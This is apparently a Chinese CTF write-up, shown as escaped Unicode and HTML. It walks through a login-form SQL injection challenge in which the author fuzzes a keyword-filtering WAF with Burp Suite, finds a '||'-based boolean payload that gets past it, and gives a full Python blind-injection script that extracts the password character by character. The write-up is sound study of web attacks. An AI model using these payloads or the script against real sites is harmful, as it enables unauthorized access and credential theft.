\n \n

\u6211\u4e5f\u662f\u840c\u65b0\uff0c\u8bb2\u7ed9\u66f4\u840c\u65b0\u7684\u542c~ \u5927\u4f6c\u53ef\u4ee5\u7565\u8fc7\u8fd9\u7bc7
\u4eca\u513f\u4ece\u540c\u5b66\u90a3\u62ff\u5230\u4e00\u9898sql\u6ce8\u5165\u9898\uff0c\u60f3\u5230\u6700\u8fd1\u5b66\u4e60\u4e86burpsuite fuzz\u7684\u529f\u80fd\uff0c\u521a\u597d\u53ef\u4ee5\u7528\u6765\u7ec3\u4e0b\u624b\uff0c\u7279\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002<\/blockquote>\n

0x01 \u6ce8\u5165\u524d\u5206\u6790<\/h2>\n

\u662f\u4e2a\u5178\u578b\u7684\u767b\u5f55\u6846SQL\u6ce8\u5165\u9898<\/p>\n

$\"\u5229\u7528$ <\/span><\/p>\n

\u5728\u6e90\u7801\u4e0a\u8fd8\u6709hint<\/p>\n

$\"\u5229\u7528$ <\/span><\/p>\n

\u9996\u5148\u8fdb\u884c\u6ce8\u5165\u524d\u7684\u5c1d\u8bd5\uff0c\u89c2\u5bdf\u662f\u5426\u6709\u62a5\u9519\u60c5\u51b5\uff0c\u6216\u8005\u662f\u6709waf\uff1a<\/p>\n

\u6b63\u5e38\u7684\u8f93\u5165\uff0c\u52062\u79cd\u60c5\u51b5\uff1a<\/p>\n

\u7528\u6237\u540d\u6b63\u786e\uff0c\u663e\u793a\u5bc6\u7801\u9519\u8befpassword error<\/code><\/span><\/p>\n<\/li>\n

\u7528\u6237\u540d\u9519\u8bef\uff0c\u663e\u793a\u65e0\u6b64\u7528\u6237no such user!<\/code><\/span><\/p>\n<\/li>\n<\/ol>\n
\u731c\u6d4b\u9a8c\u8bc1\u7528\u6237\u540d\u548c\u9a8c\u8bc1\u5bc6\u7801\u662f\u5206\u6b65\u8fdb\u884c\u7684\uff0c\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n
select uname from user where uname='xxx'\nselect uname,pwd from user where uname='xxx' and pwd='xxx'<\/code><\/pre>\n\u5b58\u5728\u6ce8\u5165\u7684\u60c5\u51b5\uff0c\u663e\u793anaive<\/code>\uff0c\u8bc1\u660e\u662f\u6709waf\u7684\uff1a<\/p>\n
<\/span><\/p>\n
\u7b80\u5355\u6d4b\u8bd5\u4e86\u4e00\u4e0bwaf\uff0c\u53d1\u73b0\u8fc7\u6ee4\u4e86or and union select from limit \u4ee5\u53ca\u7a7a\u683c,\u6ce8\u91ca\u7b26<\/code>\uff0c\u5988\u8036waf\u8fd8\u633a\u4e25\uff0c\u4e4b\u540e\u4e0d\u60f3\u901a\u8fc7\u624b\u52a8\u6d4b\u8bd5\uff0c\u4e8e\u662f\u91c7\u7528burpsuite\u8fdb\u884cFuzz\u6d4b\u8bd5\u3002<\/p>\n
0x02 Burpsuite Fuzzing<\/h2>\nBurpsuite Fuzzing\u4e3b\u8981\u662f\u901a\u8fc7Burpsuite Intruder\u6a21\u5757<\/code>\uff0c\u8fd9\u597d\u6bd4\u662f\u4e00\u628a\u67aa\uff0c\u901a\u8fc7\u7279\u5b9a\u8bbe\u7f6e\u628a\u5b50\u5f39(payload)<\/code>\u5c04\u5411\u76ee\u6807(target-site)<\/code>\u3002<\/p>\n
\u53ef\u662f\u5b50\u5f39\u4ece\u54ea\u6765\uff1f\u6211\u4eec\u5728\u8fd9\u4e4b\u524d\u8981\u505a\u4e00\u4e9b\u51c6\u5907\u5de5\u4f5c\uff1a<\/p>\n
Fuzzdb: https:\/\/github.com\/fuzzdb-pro...<\/a>\n<\/blockquote>\n\u8fd9\u662f\u4e00\u4e2afuzz\u6d4b\u8bd5\u7684payload\u5e93\uff0c\u4e0a\u9762\u6709\u5927\u91cf\u7684\u6d4b\u8bd5payload\uff0c\u975e\u5e38\u5b9e\u7528\uff0c\u6211\u4eec\u672c\u6b21sql\u6ce8\u5165\u5c31\u7528\u5230\u5b83\u3002<\/p>\n\u6211\u4eec\u4f7f\u7528\u8fd9\u4e2apayload\u5c31\u53ef\u4ee5\u4e86 \/attack\/sql-injection\/detect\/xplatform.txt<\/a><\/p>\n
<\/span><\/p>\n
\u7136\u540e\u6253\u5f00Burpsuite\uff0c\u53ef\u4ee5\u5148\u5f00\u4ee3\u7406\u6293\u4e00\u4e2a\u6b63\u5e38\u8bf7\u6c42\u5305\uff0c\u7136\u540e\u8f6c\u5230Intruder\u6a21\u5757\uff0c\u8fdb\u884c\u5982\u4e0b\u64cd\u4f5c\uff1a<\/p>\n
\n\u9009\u4e2dpositions\u9009\u9879\u5361\uff0c\u9009\u4e2duname\u7684\u503c\u90e8\u5206admin<\/code>\uff0c\u7136\u540e\u70b9\u51fb\u53f3\u4fa7\u7684add\u00a7<\/code>\uff0c\u8fd9\u6837uname\u7684\u503c\u5c31\u4f1a\u88ab\u6807\u8bb0\u4e3apayload\u7684\u52a0\u8f7d\u4f4d\u7f6e\uff0c\u5176\u4f59\u90e8\u5206\u5c31\u4e0d\u9700\u8981\u6807\u8bb0\u4e86\u3002<\/span><\/p>\n<\/li>\n
\u9009\u4e2dpayloads\u9009\u9879\u5361\uff0c\u70b9\u51fb\u56fe\u4e2d\u6240\u793a\u7684\u6309\u94ae\u52a0\u8f7d\u521a\u521a\u63d0\u5230\u7684xplatform.txt<\/code>\uff0c\u8fd9\u6837payload\u5c31\u88ab\u52a0\u8f7d\u8fdb\u53bb\u4e86\u3002<\/span><\/p>\n<\/li>\n
\u9009\u4e2doptions\u9009\u9879\u5361\uff0c\u8bbe\u7f6e\u8bf7\u6c42\u7ebf\u7a0b\u6570\u3001\u91cd\u8bd5\u6b21\u6570\u3001\u8d85\u65f6\u65f6\u95f4\u7b49\u7b49\u4fe1\u606f\uff0c\u4e0d\u4e00\u4e00\u5217\u4e3e\u4e86\u3002<\/span><\/p>\n<\/li>\n\u6700\u540e\u70b9\u51fb\u4e0a\u65b9\u83dc\u5355Intruder -> Start attack<\/code> \uff0c\u542f\u52a8\uff01<\/li>\n<\/ol>\n\u7b49\u5f85fuzz\u5b8c\u6210\u540e\uff0c\u5f97\u5230\u5982\u4e0b\u7ed3\u679c\uff1a<\/p>\n
<\/span><\/p>\n
\u6839\u636e\u8fd4\u56de\u5305\u957f\u5ea6\u53ef\u4ee5\u5206\u8fa8\u4e0d\u540c\u7684\u60c5\u51b5\uff1a202\u662fpassword error<\/code>\uff0c200\u662fno such user!<\/code>\uff0c\u8fd8\u6709189\u662fnaive<\/code>\u3002<\/p>\n
\u56e0\u6b64\u53ef\u4ee5\u53d1\u73b0\u6709\u53ef\u4ee5\u5229\u7528\u7684\u5730\u65b9\uff0c\u7b2c42\u4e2a\u8bf7\u6c42\u5305\u7684\u8fd4\u56de\u7528\u6237\u540d\u6b63\u786e\uff0c\u8bc1\u660e\u5df2\u7ecf\u7ed5\u8fc7waf\u3002<\/p>\n\u5047\u5982\u5e76\u6ca1\u6709\u53ef\u4ee5\u5229\u7528\u7684payload\uff0c\u53ef\u4ee5\u518d\u89c2\u5bdf189\u7684\u5305\u770b\u770b\u54ea\u4e9b\u5b57\u6bb5\u662f\u88abban\u6389\u7684\uff0c\u4ece\u800c\u627e\u5230\u53ef\u4ee5\u5229\u7528\u7684\u5b57\u6bb5\u3002\u7ed3\u5408\u524d\u671f\u624b\u6d4b\u7684\u60c5\u51b5\u548cfuzz\u7684\u7ed3\u679c\uff0c\u53ef\u4ee5\u5224\u65ad\uff1a\u53ef\u4f7f\u7528\uff1a# || && , ascii() left() right() length()<\/code> <\/p>\n
\u4e0d\u53ef\u4f7f\u7528\uff1a\u7a7a\u683c -- or and union select from limit mid() substr() substring()<\/code><\/p>\n<\/blockquote>\n
\u6784\u9020payload\u5982\u4e0b\uff0cxxx\u4e3apayload\uff0c\u5f53xxx\u4e3a\u771f\u65f6\u8fd4\u56depassword error<\/code>\uff0c\u800cxxx\u4e3a\u5047\u65f6\u8fd4\u56deno such user<\/code>\uff0c\u8fd9\u5c31\u6784\u6210\u4e86\u4e00\u4e2abool\u578b\u6ce8\u5165\u3002<\/p>\nuname='||xxx||'&pwd=123 <\/code><\/pre>\n\u4e0b\u4e00\u6b65\u5c31\u53ef\u4ee5\u5f00\u59cb\u5b9e\u65bd\u6ce8\u5165\u3002<\/p>\n0x03 Blind Injection\u7684\u81ea\u52a8\u5316\u6ce8\u5165<\/h2>\n\u8fd9\u4e00\u6b65\u5f00\u59cb\uff0c\u6211\u4eec\u5c31\u901a\u8fc7bool\u76f2\u6ce8\u8fdb\u884c\u7206\u7834pwd<\/code>\u5b57\u6bb5\uff0c\u811a\u672c\u8dd1\u8d77\u6765<\/p>\n\n\n\u901a\u8fc7length()<\/code>\u83b7\u5f97pwd<\/code>\u5b57\u6bb5\u957f\u5ea6<\/p>\nfor i in xrange(1,127):\n postdata = {\n 'uname':\"'||length(pwd)=\"+str(i)+\"||'\",\n 'pwd':'123'\n }\n print i,postdata\n r = s.post(url=url,headers=header,data=postdata)\n if 'password' in r.text:\n print \"get length!\"\n return <\/code><\/pre>\n\u6700\u7ec8\u83b7\u5f97length(pwd)=30<\/code><\/p>\n\u5f53\u4f60\u628a\u63e1\u4e0d\u51c6\u7684\u65f6\u5019\uff0c\u60f3\u5230hint\u7684\u63d0\u793a\uff0c\u901a\u8fc7length(uname)=5<\/code>\u9a8c\u8bc1\u4f60\u7684payload\uff0c\u4e0b\u9762\u4e5f\u4e00\u6837\u3002<\/blockquote>\n<\/li>\n\n\u7531\u4e8emid() substr()<\/code>\u88abban\u4e86\uff0c\u53ea\u80fd\u901a\u8fc7left() right()<\/code>\u8fdb\u884c\u5b57\u7b26\u4e32\u622a\u65ad\uff0c\u7136\u540e\u9010\u4f4d\u7206\u783430\u4f4d\u7684pwd<\/code><\/p>\n
pwd = ''\nfor i in xrange(0,30):\n for c in xrange(0x20,0x7f):\n postdata = {\n 'uname':\"'||(ascii(right(left(pwd,\"+str(i+1)+\"),1))=\"+str(c)+\")||'\",\n 'pwd':'123'\n }\n r = s.post(url=url,headers=header,data=postdata)\n if 'password' in r.text:\n pwd += chr(c)\n print i,pwd\n continue<\/code><\/pre>\n<\/span><\/p>\n
\u6700\u540e\u5f97\u523030\u4f4d\u5bc6\u7801\uff0c\u767b\u5f55\u8fdb\u53bb\uff0cgetflag<\/p>\n
PS\uff1a\u6ca1\u6709\u5199\u591a\u7ebf\u7a0b\uff0c\u7206\u7834\u901f\u5ea6\u6bd4\u8f83\u6162\uff0c\u4e4b\u540e\u8003\u8651\u6539\u8fdb\u4e00\u4e0bPPS\uff1a\u4e4b\u540e\u8fd8\u8981\u603b\u7ed3\u4e0b\u5404\u7c7b\u51fd\u6570\u7ec4\u5408\u4f7f\u7528\u65b9\u5f0f\uff0c\u6bd4\u5982mid()=substr()=right(left())<\/code><\/p>\n<\/blockquote>\n
\u5b8c\u6574\u811a\u672c\u5982\u4e0b\uff1a<\/p>\n
#coding=utf-8\nimport requests \n\ns = requests.session()\ns.keep_alive = False\n\nurl = 'http:\/\/23.236.125.55:1000\/34fb69d7b4467e33c71b0153e62f7e2b\/'\n\nheader = {\n'User-Agent': 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\/20100101 Firefox\/65.0',\n'Accept': 'text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8',\n'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n'Accept-Encoding': 'gzip, deflate',\n'Referer': 'http:\/\/23.236.125.55:1000\/34fb69d7b4467e33c71b0153e62f7e2b\/',\n'Content-Type': 'application\/x-www-form-urlencoded'\n}\n\ndef get_length():\n for i in xrange(1,127):\n postdata = {\n 'uname':\"'||length(pwd)=\"+str(i)+\"||'\",\n 'pwd':'123'\n }\n print i,postdata\n r = s.post(url=url,headers=header,data=postdata)\n if 'password' in r.text:\n print \"get length!\"\n return \n\ndef get_pwd_char():\n pwd = ''\n for i in xrange(0,30):\n for c in xrange(0x20,0x7f):\n postdata = {\n 'uname':\"'||(ascii(right(left(pwd,\"+str(i+1)+\"),1))=\"+str(c)+\")||'\",\n 'pwd':'123'\n }\n r = s.post(url=url,headers=header,data=postdata)\n if 'password' in r.text:\n pwd += chr(c)\n print i,pwd\n continue\n\nif __name__ == '__main__':\n get_length() #length is 30\n get_pwd_char() <\/code><\/pre>\n<\/li>\n<\/ol>\n0x04 \u603b\u7ed3\u4e00\u4e0b<\/h2>\n\n\u5229\u7528burpsuite\u8fdb\u884cfuzz\u6d4b\u8bd5\uff0c\u5927\u5927\u63d0\u9ad8\u4e86\u6d4b\u8bd5\u6548\u7387\uff0c\u4e5f\u80fd\u5feb\u901f\u5b9a\u4f4d\u6ce8\u5165\u70b9\uff0c\u8fd9\u65b9\u9762\u5728\u5e73\u65f6\u7684\u8d5b\u9898\u4e5f\u6bd4\u8f83\u5b9e\u7528\uff0c\u5173\u952e\u5c31\u5728\u4e8e\u627e\u5230\u597d\u7528\u7684fuzz payload\u3002<\/li>\n
\u7075\u6d3b\u4f7f\u7528\u5404\u7c7bsql\u51fd\u6570\uff0c\u627e\u5230\u6ca1\u6709\u88abban\u7684\u51fd\u6570\u8fdb\u884c\u6784\u9020\u4ece\u800c\u5b9e\u73b0\u7206\u7834\uff0c\u5982\u679c\u9047\u5230\u5176\u4ed6\u7c7b\u578bwaf\u8fd8\u8981\u8fdb\u884c\u6539\u5199\u3002<\/li>\n<\/ul>\n\u636e\u8bf4bugkuCTF\u6709\u7c7b\u4f3c\u7684\u4e00\u9053\u9898SQL\u6ce8\u51652<\/a>\uff0c\u8fc7\u53bb\u6bd4\u8f83\u4e00\u4e0b\u533a\u522b<\/blockquote>\n\n <\/article>\n\n \n